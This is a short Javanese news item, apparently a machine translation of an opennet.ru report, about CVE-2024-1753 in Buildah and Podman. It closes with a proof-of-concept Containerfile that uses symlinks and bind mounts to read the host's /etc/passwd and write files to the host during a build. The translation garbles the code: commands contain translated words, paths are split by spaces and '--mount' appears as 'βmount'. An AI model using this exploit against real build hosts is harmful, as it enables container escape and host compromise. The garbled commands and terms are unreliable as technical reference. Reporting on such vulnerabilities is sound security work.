Kerentanan (CVE-2024-1753) wis diidentifikasi ing paket Buildah lan Podman, sing ngidini akses lengkap menyang sistem file lingkungan host sajrone tahap mbangun wadhah sing mlaku kanthi hak akses root. Ing sistem kanthi SE diaktifakeLinux Akses menyang sistem file host diwatesi mung kanggo mode maca-mung. Perbaikan iki saiki kasedhiya minangka patch, sing bubar ditampa ing basis kode Buildah.
Kerentanan kasebut disebabake kasunyatan manawa nalika masang bagean sistem file nggunakake perintah "mount -bind" sajrone mbangun ing tahap RUN, argumen karo direktori sumber (parameter "sumber =") ora dicenthang kanggo ndeleng. yen ana ing sistem file root. File konfigurasi Containerfile sing dirancang dening panyerang bisa nggunakake gambar wadhah sing direktori mount sumber diformat minangka link simbolis menyang sistem file root. Ing kasus iki, operasi gunung bakal mimpin kanggo soyo tambah sistem file ROOT saka lingkungan host nang wadhah, kang bakal ngidini ing tataran RUN kanggo entuk akses lengkap menyang sistem file saka lingkungan inang lan ngatur metu saka wadhah sak mbangun nggunakake "buildah mbangun" utawa "podman mbangun" printah.
Conto Containerfile angkoro, sing dibangun nganggo printah "podman build -f ~/Containerfile ." bakal nuduhake isi / etc / passwd lan nggawe file / BIND_BREAKEOUT lan / etc / BIND_BREAKOUT2 ing lingkungan host: FROM alpine minangka basis RUN ln -s / / rootdir RUN ln -s / etc / etc 2 FROM alpine RUN echo "ls root container " RUN ls -l / RUN echo "Kanthi exploitasi show host root, dudu root container, lan gawe / BIND_BREAKOUT in / on host" RUN βmount=type=bind,from=base,source=/rootdir,destination =/ exploit,rw ls -l /exploit; tutul / exploit / BIND_BREAK OUT; ls -l / exploit RUN echo "Kanthi exploit show host / etc / passwd, dudu wadah, lan gawe / BIND_BREAKOUT2 ing / etc ing host" RUN βmount=type=bind,rw,source=/etc2,destination=/ etc2, saka = basa ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; tutul /etc2/BIND_BREAKOUT2; ls -l / etc2
Source: opennet.ru
